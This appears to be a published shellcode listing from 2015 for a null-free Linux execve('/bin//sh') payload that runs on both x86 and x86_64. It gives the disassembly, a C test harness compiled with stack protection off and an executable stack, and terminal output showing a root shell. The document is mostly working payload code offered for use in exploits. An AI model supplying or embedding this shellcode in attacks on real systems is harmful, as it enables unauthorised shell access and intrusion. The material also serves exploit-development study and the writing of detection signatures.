#Cross-Linux execve shellcode [works on x86/x86_64]


#Coded by B3mB4m
#4.11.2015
#This shellcodes works on both x86 and x64(null-free) :>



Disassembly of section .text:

08048060 <.text>:
 8048060:  31 c0                  xor    %eax,%eax
 8048062:  40                     inc    %eax
 8048063:  74 15                  je     0x804807a
 8048065:  31 c0                  xor    %eax,%eax
 8048067:  50                     push   %eax
 8048068:  68 2f 2f 73 68         push   $0x68732f2f
 804806d:  68 2f 62 69 6e         push   $0x6e69622f
 8048072:  89 e3                  mov    %esp,%ebx
 8048074:  89 c2                  mov    %eax,%edx
 8048076:  b0 0b                  mov    $0xb,%al
 8048078:  cd 80                  int    $0x80
 804807a:  48                     dec    %eax
 804807b:  31 c0                  xor    %eax,%eax
 804807d:  48                     dec    %eax
 804807e:  83 c0 3b               add    $0x3b,%eax
 8048081:  48                     dec    %eax
 8048082:  31 ff                  xor    %edi,%edi
 8048084:  57                     push   %edi
 8048085:  48                     dec    %eax
 8048086:  bf 2f 62 69 6e         mov    $0x6e69622f,%edi
 804808b:  2f                     das    
 804808c:  2f                     das    
 804808d:  73 68                  jae    0x80480f7
 804808f:  57                     push   %edi
 8048090:  48                     dec    %eax
 8048091:  8d 3c 24               lea    (%esp),%edi
 8048094:  48                     dec    %eax
 8048095:  31 f6                  xor    %esi,%esi
 8048097:  48                     dec    %eax
 8048098:  31 d2                  xor    %edx,%edx
 804809a:  0f 05                  syscall 



#include <stdio.h>
#include <string.h>
#gcc -fno-stack-protector -z execstack shell.c -o shell

unsigned char shellcode[] = "\x31\xc0\x40\x74\x15\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";

int main(void){
  fprintf(stdout,"Length: %d\n",strlen(shellcode));
  (*(void(*)()) shellcode)();


}


x86
=====

root@b3mb4m:~/Desktop# uname -a
Linux b3mb4m 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux
root@b3mb4m:~/Desktop# ./shell
Length: 60
# 

x64
=====

root@whoami:/home/whoami/Desktop# uname -a
Linux whoami 3.19.0-33-generic #38~14.04.1-Ubuntu SMP Fri Nov 6 18:17:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@whoami:/home/whoami/Desktop# ./shell
Length: 60
#